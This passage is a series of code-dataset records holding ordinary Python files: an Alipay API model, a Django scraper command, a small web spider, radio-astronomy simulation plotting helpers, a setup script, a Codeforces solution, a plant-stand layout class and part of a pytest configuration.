'to_alipay_dict'):\n params['request_no'] = self.request_no.to_alipay_dict()\n else:\n params['request_no'] = self.request_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = MybankPaymentTradeBusinessOperateQueryModel()\n if 'order_no' in d:\n o.order_no = d['order_no']\n if 'request_no' in d:\n o.request_no = d['request_no']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/MybankPaymentTradeBusinessOperateQueryModel.py","file_name":"MybankPaymentTradeBusinessOperateQueryModel.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624547462","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom order.data_scraper import Scraper\n\nclass Command(BaseCommand):\n\n help = 'Populates or updates database with new products'\n\n def handle(self, *args, **kwargs):\n headers = settings.HEADERS\n url = settings.SCRAPE_URL\n dataframe = Scraper(url, headers)\n dataframe.run()\n","sub_path":"dropship_django/product/management/commands/run_scraper.py","file_name":"run_scraper.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"220751873","text":"#!/usr/bin/env python3\n#\n# File: spider3.py\n# Author: Matt Weidner \n# Descr: Simple web spider that spiders arbitrary site up to\n# X levels deep, customizable by the user.\n# (POC web spider)\n\n\nimport httplib2\nfrom lxml import etree\nimport pprint\nimport re\nimport sys\n\ndebug = False\nlinks = []\nmax_depth = 9999\ndot_count = 0\n\ndef dbg_print(string):\n if debug != False:\n print(' [D]: ' + string)\n\ndef fix_url(base_url, link):\n # Resolves a relative URL to an absolute URL.\n if re.search('^\\w+:', link):\n return link\n elif link[0] == '/':\n return (base_url + link[1:])\n else:\n return (base_url + link)\n\ndef fix_urls(base_url, links):\n new_urls = []\n for url in links:\n if url == '':\n continue\n new_urls.append(fix_url(base_url, url))\n return new_urls\n\ndef get_page_links(http, link):\n new_urls = []\n # HTTP GET a URL and return a list of links parsed from anchor tags.\n r_header,r_body = http.request(link, 'GET')\n #dbg_print('raw type: ' + r_header['content-type'])\n if re.search('text/html',r_header['content-type']):\n if len(r_header['content-type']) < 19:\n str_content_type = 'us-ascii'\n else:\n str_content_type = r_header['content-type'][19:]\n dbg_print('parsed type: ' + str_content_type)\n html = etree.HTML(r_body.decode(str_content_type))\n if (html.xpath('//a/@href')):\n new_urls = html.xpath('//a/@href')\n return new_urls\n\ndef spider(http, base_url, link, mapped_links, unmapped_links, depth):\n global dot_count\n dbg_print('D(' + str(depth) + ') L: ' + link)\n if depth == 0:\n return\n absolute_link = fix_url(base_url, link)\n dbg_print('[spdr] ' + absolute_link)\n page_links = get_page_links(http, absolute_link)\n if not (absolute_link in mapped_links):\n mapped_links.append(absolute_link)\n print(absolute_link)\n if not sys.stdout.isatty():\n print('.',end='',file=sys.stderr)\n dot_count = dot_count + 1\n sys.stderr.flush()\n if dot_count == 40:\n print('',file=sys.stderr)\n dot_count = 0\n if debug:\n pprint.pprint(page_links)\n if not page_links == None:\n unmapped_links = unmapped_links + page_links\n else:\n return\n #pprint.pprint(unmapped_links)\n unmapped_links = fix_urls(base_url, unmapped_links)\n #pprint.pprint(unmapped_links)\n if len(unmapped_links) > 0:\n for link2 in unmapped_links:\n if link2 == '':\n continue\n if not (link2 in mapped_links):\n if re.search('^' + base_url, link2):\n spider(http, base_url, link2, mapped_links, unmapped_links, depth-1)\n\ndef main():\n print(\" _______ _____ _____ ______ _______ ______ _____ __ __\", file=sys.stderr)\n print(\" |______ |_____] | | \\ |______ |_____/ |_____] \\_/ \", file=sys.stderr)\n print(\" ______| | __|__ |_____/ |______ | \\_ . | | \", file=sys.stderr)\n if len(sys.argv) < 2: \n print('[-] No URL specified, using http://www.testfire.net/')\n base_url = 'http://www.testfire.net/'\n else:\n base_url = sys.argv[1]\n http = httplib2.Http('.cache')\n spider(http, base_url, base_url, [], [], max_depth)\n if not sys.stdout.isatty():\n print(' ',file=sys.stderr)\n\nif __name__ == '__main__':\n main()\n","sub_path":"spider3.py","file_name":"spider3.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"627059090","text":"\"\"\" Functions that help with SKA simulations\n\n\"\"\"\n\n__all__ = ['plot_visibility', 'plot_visibility_pol', 'find_times_above_elevation_limit', 'plot_uvcoverage',\n 'plot_azel', 'plot_gaintable', 'plot_pointingtable', 'find_pb_width_null',\n 'create_simulation_components', 'plot_pa']\n\nimport logging\n\nimport astropy.constants as constants\nimport astropy.units as units\nimport matplotlib.pyplot as plt\nimport numpy\nfrom astropy.coordinates import SkyCoord\n\nfrom rascil.data_models.memory_data_models import Skycomponent, BlockVisibility\nfrom rascil.data_models.polarisation import PolarisationFrame\nfrom rascil.processing_components.image import create_image\nfrom rascil.processing_components.image.operations import show_image\nfrom rascil.processing_components.imaging.primary_beams import create_pb\nfrom rascil.processing_components.skycomponent.base import copy_skycomponent\nfrom rascil.processing_components.skycomponent.operations import apply_beam_to_skycomponent, \\\n filter_skycomponents_by_flux\nfrom rascil.processing_components.util.coordinate_support import hadec_to_azel\nfrom rascil.processing_components.visibility.visibility_geometry import calculate_blockvisibility_hourangles, \\\n calculate_blockvisibility_azel, calculate_blockvisibility_parallactic_angles\n\nlog = logging.getLogger('logger')\n\n\ndef find_times_above_elevation_limit(start_times, end_times, location, phasecentre, elevation_limit):\n \"\"\" Find all times for which a phasecentre is above the elevation limit\n \n :param start_times:\n :param end_times:\n :param location:\n :param phasecentre:\n :param elevation_limit:\n :return:\n \"\"\"\n assert len(start_times) == len(end_times)\n \n def valid_elevation(time, location, phasecentre):\n ha = numpy.pi * time / 43200.0\n dec = phasecentre.dec.rad\n az, el = hadec_to_azel(ha, dec, location.lat.rad)\n return el > elevation_limit * numpy.pi / 180.0\n \n number_valid_times = 0\n valid_start_times = []\n for it, t in enumerate(start_times):\n if valid_elevation(start_times[it], location, phasecentre) or \\\n valid_elevation(end_times[it], location, phasecentre):\n valid_start_times.append(t)\n number_valid_times += 1\n \n assert number_valid_times > 0, \"No data above elevation limit\"\n \n log.info(\"find_times_above_elevation_limit: Start times for chunks above elevation limit:\")\n \n return valid_start_times\n\n\ndef plot_visibility(vis_list, title='Visibility', y='amp', x='uvdist', plot_file=None, plot_zero=False, *kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, 0]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, 0]).flat\n xvalue = vis.uvdist.flat\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color='b', markersize=0.2)\n if plot_zero:\n plt.plot(xvalue[yvalue == 0.0], yvalue[yvalue == 0.0], '.', color='r', markersize=0.2)\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\ndef plot_visibility_pol(vis_list, title='Visibility_pol', y='amp', x='uvdist', plot_file=None, **kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n pols = vis.polarisation_frame.names\n colors = [\"red\", \"blue\", \"green\", \"purple\"]\n for pol in range(vis.vis.shape[-1]):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, pol]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, pol]).flat\n if x==\"time\":\n xvalue = numpy.repeat(vis.time, len(yvalue))\n else:\n xvalue = vis.uvdist.flat\n if ivis == 0:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol],\n label=pols[pol])\n else:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol])\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\n\ndef plot_uvcoverage(vis_list, ax=None, plot_file=None, title='UV coverage', **kwargs):\n \"\"\" Standard plot of uv coverage\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n \n for ivis, vis in enumerate(vis_list):\n u = numpy.array(vis.u[...].flat)\n v = numpy.array(vis.v[...].flat)\n if isinstance(vis, BlockVisibility):\n k = (vis.frequency / constants.c).value\n u = numpy.array(numpy.outer(u, k).flat)\n v = numpy.array(numpy.outer(v, k).flat)\n plt.plot(u, v, '.', color='b', markersize=0.2)\n plt.plot(-u, -v, '.', color='b', markersize=0.2)\n else:\n k = vis.frequency / constants.c\n u = u * k\n v = v * k\n plt.plot(u.value, v.value, '.', color='b', markersize=0.2)\n plt.plot(-u.value, -v.value, '.', color='b', markersize=0.2)\n plt.xlabel('U (wavelengths)')\n plt.ylabel('V (wavelengths)')\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_azel(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of az el coverage\n \n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2d = 180.0 / numpy.pi\n \n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n az, el = calculate_blockvisibility_azel(bvis)\n if ibvis == 0:\n plt.plot(ha, az.deg, '.', color='r', label='Azimuth (deg)')\n plt.plot(ha, el.deg, '.', color='b', label='Elevation (deg)')\n else:\n plt.plot(ha, az.deg, '.', color='r')\n plt.plot(ha, el.deg, '.', color='b')\n plt.xlabel('HA (hours)')\n plt.ylabel('Angle')\n plt.legend()\n plt.title('Azimuth and elevation vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pa(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of parallactic angle coverage\n\n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n\n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n pa = calculate_blockvisibility_parallactic_angles(bvis)\n if ibvis == 0:\n plt.plot(ha, pa.deg, '.', color='r', label='PA (deg)')\n else:\n plt.plot(ha, pa.deg, '.', color='r')\n plt.xlabel('HA (hours)')\n plt.ylabel('Parallactic Angle')\n plt.legend()\n plt.title('Parallactic angle vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_gaintable(gt_list, title='', value='amp', plot_file='gaintable.png', **kwargs):\n \"\"\" Standard plot of gain table\n \n :param gt_list:\n :param title:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for igt, gt in enumerate(gt_list):\n nrec = gt[0].nrec\n names = gt[0].receptor_frame.names\n if nrec > 1:\n recs = [0, 1]\n else:\n recs = [1]\n \n colors = ['r', 'b']\n for irec, rec in enumerate(recs):\n amp = numpy.abs(gt[0].gain[:, 0, 0, rec, rec])\n if value == 'phase':\n y = numpy.angle(gt[0].gain[:, 0, 0, rec, rec])\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec])\n else:\n y = amp\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec])\n plt.title(title)\n plt.xlabel('Time (s)')\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pointingtable(pt_list, plot_file, title, **kwargs):\n \"\"\" Standard plot of pointing table\n \n :param pt_list:\n :param plot_file:\n :param title:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2a = 180.0 * 3600.0 / numpy.pi\n rms_az = 0.0\n rms_el = 0.0\n num = 0\n for pt in pt_list:\n num += len(pt.pointing[:, 0, 0, 0, 0])\n rms_az += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 0]) ** 2)\n rms_el += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 1]) ** 2)\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 0], '.', color='r')\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 1], '.', color='b')\n \n rms_az = numpy.sqrt(rms_az / num)\n rms_el = numpy.sqrt(rms_el / num)\n plt.title(\"%s az, el rms %.2f %.2f (arcsec)\" % (title, rms_az, rms_el))\n plt.xlabel('Time (s)')\n plt.ylabel('Offset (arcsec)')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef find_pb_width_null(pbtype, frequency, **kwargs):\n \"\"\" Rough estimates of HWHM and null locations\n \n :param pbtype:\n :param frequency:\n :param kwargs:\n :return:\n \"\"\"\n if pbtype == 'MID':\n HWHM_deg = 0.596 * 1.36e9 / frequency[0]\n null_az_deg = 2.0 * HWHM_deg\n null_el_deg = 2.0 * HWHM_deg\n elif pbtype == 'MID_FEKO_B1':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_B2':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_Ku':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n else:\n null_az_deg = 1.145 * 1.36e9 / frequency[0]\n null_el_deg = 1.145 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n \n return HWHM_deg, null_az_deg, null_el_deg\n\n\ndef create_simulation_components(context, phasecentre, frequency, pbtype, offset_dir, flux_limit,\n pbradius, pb_npixel, pb_cellsize, show=False, fov=10,\n polarisation_frame=PolarisationFrame(\"stokesI\"),\n filter_by_primary_beam=True, flux_max=10.0):\n \"\"\" Construct components for simulation\n \n :param context: singlesource or null or s3sky\n :param phasecentre: Centre of components\n :param frequency: Frequency\n :param pbtype: Type of primary beam\n :param offset_dir: Offset in ra, dec degrees\n :param flux_limit: Lower limit flux\n :param pbradius: Radius of components in radians\n :param pb_npixel: Number of pixels in the primary beam model\n :param pb_cellsize: Cellsize in primary beam model\n :param fov: FOV in degrees (used to select catalog)\n :param flux_max: Maximum flux in model before application of primary beam\n :param filter_by_primary_beam: Filter components by primary beam\n :param polarisation_frame:\n :param show:\n\n :return:\n \"\"\"\n \n HWHM_deg, null_az_deg, null_el_deg = find_pb_width_null(pbtype, frequency)\n \n dec = phasecentre.dec.deg\n ra = phasecentre.ra.deg\n \n if context == 'singlesource':\n log.info(\"create_simulation_components: Constructing single component\")\n offset = [HWHM_deg * offset_dir[0], HWHM_deg * offset_dir[1]]\n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n # The point source is offset to approximately the halfpower point\n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n offset_direction = odirection\n \n elif context == 'doublesource':\n \n original_components = []\n \n log.info(\"create_simulation_components: Constructing double components\")\n \n for sign_offset in [(-1, 0), (1, 0)]:\n offset = [HWHM_deg * sign_offset[0], HWHM_deg * sign_offset[1]]\n \n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n if polarisation_frame.type == \"stokesIQUV\":\n original_components.append(\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV')))\n else:\n original_components.append(\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI')))\n \n for o in original_components:\n print(o)\n \n offset_direction = odirection\n \n elif context == 'null':\n log.info(\"create_simulation_components: Constructing single component at the null\")\n \n offset = [null_az_deg * offset_dir[0], null_el_deg * offset_dir[1]]\n HWHM = HWHM_deg * numpy.pi / 180.0\n \n log.info(\"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (offset[0], offset[1]))\n \n # The point source is offset to approximately the null point\n offset_direction = SkyCoord(ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n else:\n offset = [0.0, 0.0]\n # Make a skymodel from S3\n max_flux = 0.0\n total_flux = 0.0\n log.info(\"create_simulation_components: Constructing s3sky components\")\n from rascil.processing_components.simulation import create_test_skycomponents_from_s3\n \n all_components = create_test_skycomponents_from_s3(flux_limit=flux_limit / 100.0,\n phasecentre=phasecentre,\n polarisation_frame=polarisation_frame,\n frequency=numpy.array(frequency),\n radius=pbradius,\n fov=fov)\n original_components = filter_skycomponents_by_flux(all_components, flux_max=flux_max)\n log.info(\"create_simulation_components: %d components before application of primary beam\" %\n (len(original_components)))\n \n\n \n if filter_by_primary_beam:\n pbmodel = create_image(npixel=pb_npixel,\n cellsize=pb_cellsize,\n phasecentre=phasecentre,\n frequency=frequency,\n polarisation_frame=PolarisationFrame(\"stokesI\"))\n stokesi_components = [copy_skycomponent(o) for o in original_components]\n for s in stokesi_components:\n s.flux = numpy.array([[s.flux[0, 0]]])\n s.polarisation_frame = PolarisationFrame(\"stokesI\")\n \n pb = create_pb(pbmodel, \"MID_GAUSS\", pointingcentre=phasecentre, use_local=False)\n pb_applied_components = [copy_skycomponent(c) for c in stokesi_components]\n pb_applied_components = apply_beam_to_skycomponent(pb_applied_components, pb)\n filtered_components = []\n for icomp, comp in enumerate(pb_applied_components):\n if comp.flux[0, 0] > flux_limit:\n total_flux += comp.flux[0, 0]\n if abs(comp.flux[0, 0]) > max_flux:\n max_flux = abs(comp.flux[0, 0])\n filtered_components.append(original_components[icomp])\n log.info(\"create_simulation_components: %d components > %.3f Jy after filtering with primary beam\" %\n (len(filtered_components), flux_limit))\n log.info(\"create_simulation_components: Strongest components is %g (Jy)\" % max_flux)\n log.info(\"create_simulation_components: Total flux in components is %g (Jy)\" % total_flux)\n original_components = [copy_skycomponent(c) for c in filtered_components]\n if show:\n plt.clf()\n show_image(pb, components=original_components)\n plt.show(block=False)\n \n log.info(\"create_simulation_components: Created %d components\" % len(original_components))\n # Primary beam points to the phasecentre\n offset_direction = SkyCoord(ra=ra * units.deg, dec=dec * units.deg, frame='icrs',\n equinox='J2000')\n \n return original_components, offset_direction\n","sub_path":"rascil/processing_components/simulation/simulation_helpers.py","file_name":"simulation_helpers.py","file_ext":"py","file_size_in_byte":18987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"328187947","text":"# coding=utf-8\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='request_log_info',\n version='1.0.0',\n description='',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='zhangruyu',\n author_email='1582034460@qq.com',\n license=\"BSD\",\n url='https://github.com/zhangruyu/request_log_info',\n packages=find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n ],\n)\n\n# python setup.py sdist buil\n# python setup.py sdist buil\n","sub_path":"pypi_install_script/request_log_info-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"29646810","text":"'''\n#!/usr/bin/python\n\ndef ia(): return map(int, raw_input().split())\n\nn, k = ia()\np = ia()\nc = ia()\n\nh = []\nP = zip(p, c, xrange(n))\nP.sort()\n\nlst = [None] * n\nh = []\nfor p, c, i in P:\n ans = c + sum(h)\n lst[i] = ans\n h.append(c)\n h.sort(reverse=True)\n h = h[:k]\n\nprint \" \".join(map(str, lst))\n\n4 2\n4 5 9 7\n1 2 11 33\n'''\nnk, k = [int(x) for x in input().split()]\nknights = [int(x) for x in input().split()]\ncoins = [int(x) for x in input().split()]\n\ndata = sorted(zip(knights, coins, range(nk)))\nhave = [0] * nk\nselected = []\nfor p, c, i in data:\n ans = c + sum(selected)\n have[i] = ans\n selected.append(c)\n selected = sorted(selected, reverse=True)[:k]\nprint(*have)\n\n\n\n\n\n\n","sub_path":"CodeForces/488_B_knightsOfPolygonTable.py","file_name":"488_B_knightsOfPolygonTable.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309512585","text":"\"\"\"\r\nClass interface for stand generation\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nfrom random import sample\r\nfrom scipy.interpolate import interp1d\r\n\r\nfrom alinea.adel.stand.stand import agronomicplot, regular_plot\r\n\r\nclass AgronomicStand(object):\r\n \r\n def __init__(self, sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n self.sowing_density = sowing_density\r\n self.inter_row = inter_row\r\n self.plant_density = plant_density\r\n self.inter_plant = 1. / inter_row / sowing_density\r\n self.noise = noise\r\n df = density_curve_data\r\n if df is None:\r\n self.density_curve=None\r\n else:\r\n #hs_curve = interp1d(df['HS'], df['density'])\r\n TT_curve = interp1d(df['TT'], df['density'])\r\n #self.density_curve = {'hs_curve':hs_curve,'TT_curve':TT_curve}\r\n self.density_curve = TT_curve\r\n \r\n \r\n \r\n def plot_dimensions(self, nplants =1, aspect = 'square'):\r\n \r\n if aspect =='square':\r\n side = sqrt(1. / self.sowing_density * nplants)\r\n nrow = max(1, round(side / self.inter_row))\r\n plant_per_row = max(1, round(side / self.inter_plant)) \r\n plot_length = self.inter_plant * plant_per_row\r\n plot_width = self.inter_row * nrow\r\n return plot_length, plot_width\r\n elif aspect == 'line':\r\n plot_width = self.inter_row \r\n plot_length = nplants * self.inter_plant * self.sowing_density / float(self.plant_density) if self.plant_density > 0. else 0.\r\n return plot_length, plot_width \r\n else:\r\n return 0.5, 0.5\r\n \r\n def smart_stand(self, nplants=1, at=None):\r\n \"\"\" return an (almost) square stand that match inter-row, current density and nplants in the stand, \r\n but (dynamicaly) adjusting inter-plant to solve the problem\r\n \"\"\"\r\n \r\n density = self.plant_density\r\n if at is not None:\r\n if self.density_curve is not None:\r\n density = self.density_curve(at)\r\n \r\n # find a square design for sowing\r\n nsown = nplants * 1. * self.sowing_density / density\r\n side = sqrt(1. / self.sowing_density * nsown)\r\n nrow = int(max(1, round(side / self.inter_row)))\r\n plant_per_row = int(max(1, round(float(nsown) / nrow)))\r\n while nplants > (nrow * plant_per_row):\r\n plant_per_row += 1\r\n domain_area = nrow * self.inter_row * plant_per_row * self.inter_plant\r\n # adjust inter_plant spacing so that n_emerged / domain_area match plant density \r\n n_emerged = int(round(domain_area * density))\r\n #assert(n_emerged >= nplants)\r\n n_emerged = nplants\r\n target_domain_area = 1. * n_emerged / density\r\n inter_plant = target_domain_area / (plant_per_row * nrow * self.inter_row) \r\n \r\n positions, domain, domain_area = regular_plot(inter_plant, self.inter_row, nrow, plant_per_row, noise=self.noise)\r\n\r\n positions = sample(positions, nplants)\r\n return nplants, domain, positions, domain_area\r\n \r\n \r\n def stand(self, nplants = 1, aspect='square'):\r\n \r\n length, width = self.plot_dimensions(nplants, aspect)\r\n n_emerged, positions, domain, domain_area, convUnit = agronomicplot(length, width, self.sowing_density, self.plant_density, self.inter_row, noise=self.noise)\r\n \r\n return n_emerged, domain, positions, length * width\r\n \r\n def plot(self, positions):\r\n import pandas\r\n \r\n df = pandas.DataFrame(positions)\r\n df.plot(0,1,style='o')\r\n \r\n \r\ndef agronomicStand_node(sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n return AgronomicStand(**locals())","sub_path":"adel/Stand.py","file_name":"Stand.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"48756783","text":"import os\nimport subprocess\nimport datetime\n\nfrom bs4 import BeautifulSoup\n\nimport pytest\nfrom alembic.command import upgrade\nfrom alembic.config import Config\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nimport sqlalchemy\nfrom flask_jwt_extended import create_access_token, create_refresh_token\n\nfrom app import create_app, db as _db, get_env\nfrom app.models import EVENT\nfrom tests.db import (\n create_article,\n create_email,\n create_event,\n create_event_date,\n create_event_type,\n create_fee,\n create_marketing,\n create_member,\n create_reject_reason,\n create_speaker,\n create_user,\n create_venue\n)\n\nTEST_DATABASE_URI = \"postgresql://localhost/na_api_\" + get_env() + '_test'\nTEST_ADMIN_USER = 'admin@example.com'\nTEST_ADMIN_USER_CONFIG = 'admin-config@example.com'\n\n\n@pytest.yield_fixture(scope='session')\ndef app():\n _app = create_app(**{\n 'TESTING': True,\n 'ENVIRONMENT': 'test',\n 'SQLALCHEMY_DATABASE_URI': TEST_DATABASE_URI,\n 'PREFERRED_URL_SCHEME': 'http',\n 'ADMIN_CLIENT_ID': 'testadmin',\n 'ADMIN_CLIENT_SECRET': 'testsecret',\n 'TOKEN_EXPIRY': 1,\n 'JWT_SECRET_KEY': 'secret',\n 'ADMIN_USERS': [TEST_ADMIN_USER_CONFIG],\n 'EMAIL_DOMAIN': 'example.com',\n 'EMAIL_TOKENS': {\"member_id\": \"memberid\", \"type\": \"typeid\"},\n 'EMAIL_SALT': 'test',\n 'EMAIL_UNSUB_SALT': 'unsub_test',\n 'TEST_EMAIL': 'test@example.com',\n 'EVENTS_MAX': 2,\n 'PROJECT': 'test-project',\n 'STORAGE': 'test-store',\n 'PAYPAL_URL': 'https://test.paypal',\n 'PAYPAL_USER': 'seller@test.com',\n 'PAYPAL_PASSWORD': 'test pass',\n 'PAYPAL_SIG': 'paypal signature',\n 'PAYPAL_RECEIVER': 'receiver@example.com',\n 'PAYPAL_VERIFY_URL': 'https://test.paypal/verify',\n 'API_BASE_URL': 'http://test',\n 'FRONTEND_URL': 'http://frontend-test',\n 'FRONTEND_ADMIN_URL': 'http://frontend-test/admin',\n 'CELERY_BROKER_URL': 'http://mock-celery',\n 'EMAIL_DELAY': 60\n })\n\n ctx = _app.app_context()\n ctx.push()\n\n yield _app\n\n ctx.pop()\n\n\n@pytest.fixture(scope='session')\ndef db(app):\n assert _db.engine.url.database.endswith('_test'), 'dont run tests against main db'\n\n create_test_db_if_does_not_exist(_db)\n\n Migrate(app, _db)\n Manager(_db, MigrateCommand)\n BASE_DIR = os.path.dirname(os.path.dirname(__file__))\n ALEMBIC_CONFIG = os.path.join(BASE_DIR, 'migrations')\n config = Config(ALEMBIC_CONFIG + '/alembic.ini')\n config.set_main_option(\"script_location\", ALEMBIC_CONFIG)\n\n with app.app_context():\n upgrade(config, 'head')\n\n yield _db\n\n _db.session.remove()\n _db.get_engine(app).dispose()\n\n\n@pytest.fixture(scope='function')\ndef db_session(db):\n yield db\n\n db.session.remove()\n for tbl in reversed(db.metadata.sorted_tables):\n if tbl.name not in [\"event_states\", \"email_types\", \"email_states\", \"ticket_types\", \"ticket_statuses\"]:\n db.engine.execute(tbl.delete())\n db.session.commit()\n\n\n@pytest.fixture(scope='function')\ndef sample_article(db):\n return create_article(title='Ancient Greece')\n\n\n@pytest.fixture(scope='function')\ndef sample_email(db):\n return create_email(\n details='Fees: 10, Concessions: 5',\n created_at='2019-06-01',\n expires='2019-07-01'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_marketing(db):\n return create_marketing(\n old_id=1,\n description='Leaflet'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_member(db):\n return create_member(\n name='Sue Green',\n email='sue@example.com'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event(db):\n return create_event(title='test_title', description='test description')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_with_dates(db, sample_event_date_without_event):\n another_event_date = create_event_date(event_datetime='2018-01-02 19:00')\n return create_event(\n title='test_title',\n description='test description',\n event_dates=[sample_event_date_without_event, 